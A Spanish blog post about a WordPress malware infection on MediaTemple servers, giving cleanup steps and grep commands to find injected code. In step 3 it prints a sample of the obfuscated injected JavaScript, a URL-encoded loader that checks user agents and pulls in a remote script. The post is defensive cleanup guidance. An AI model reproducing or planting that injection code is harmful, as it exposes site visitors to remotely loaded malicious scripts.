Problemas con MediaTemple y WordPress?


Es muy probable que esta imagen les sea familiar. Hace un par de semanas tuvimos un serio problema de Badware dentro del servidor donde esta alojado mi blog y otros sitios web.

Según me explicó el intrépido Dux, el problema surgió a partir de una vulnerabilidad en WordPress que se “aprovechó” de los Grid Servers de MediaTemple para reproducirse de forma campante y voraz.

…Así que ya pueden imaginarse cómo fue de bonito encontrar aquel aviso rojo de la muerte en nuestros sitios.

Lo único rescatable del asunto es que la información que teníamos en las bases de datos no fue alterada o accedida por terceros, así que no estaremos en (otra) lista para espamear.

Por esta razón, y si usted tiene problemas de gastritis o estrés crónico por estar padeciendo este ataque, quiero compartirles unas instrucciones para solucionar el problema en Uh Lee Ka. A continuación las resumo, pero les recomiendo que lean todo el post:

  1. Busquen si un tal “JohnnyA” es administrador de su blog. Si además de él encuentran a otros usuarios sospechosos, borrenlos con la mayor sevicia.
  2. Haga un backup de la info en su base de datos
  3. Usando SSH, busque entre sus dominios las alimañas que se encuentran dentro de los archivos Javascript usando esta instrucción:

    grep -R "document.write(unescape" *

    Dentro del resultado encontrarán archivos de Google Analytics, AdWords y otros, pero si encuentran algo sospechoso como esto:

    <ads><script type="text/javascript">var st1 = 0; document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A %61%76%61%73%63%72%69%70%74%22%3E%76%61%72%20%61%3D%77%69%6E%64%6F%77%2E%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2C%62%3D%2F%28%79%61%68%6F%6F%7C%73%65%61%72 %63%68%7C%6D%73%6E%62%6F%74%7C%79%61%6E%64%65%78%7C%67%6F%6F%67%6C%65%62%6F%74%7C%62%69%6E%67%7C%61%73%6B%29%2F%69%2C%63%3D%6E%61%76%69%67%61%74%6F%72%2E%61%70%70%56%65%72%73%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%27%2B%65%5B%67%5D%2B%64%5B%66%5D%2B%27%2F%64%61%74%61%2F%6D%6F%6F%74%6F%6F%6C%73%2E%6A%73%22%3E%3C%5C%2F%73%63%72%69%70%74%3E%27%29%7D%3B%3C%2F%73%63%72%69%70%74%3E'));var gr0=0;</script></ads>

    Los felicito, hacen parte de este club, por lo que tienen que borrar todo el código que no pertenece originalmente a los archivos.

  4. Pero eso no es todo, también tienen que revisar los archivos php:

    grep -iR --include "*.php" "[a-zA-Z0-9\/\+]\{255,\}" *

    Si encuentran algo extraño en los archivos, ya saben qué hacer: Borrar el código sospechoso.

Con esta limpieza podrán eliminar los archivos, pero es recomendable que cambien las contraseñas de acceso via FTP, SSH y de acceso a las bases de datos.

Ahora bien y para finalizar, es cierto que algunos sitios en nuestro servidor siguen presentando ese infame aviso (como en el blog de la Colores Mari), pero les podemos garantizar que seguimos al pie de la letra las instrucciones limpiando y extraditando todas las alimañas que encontramos.



Share
Tags
Written by carlos


Twitter feed responded with an HTTP status code of 403.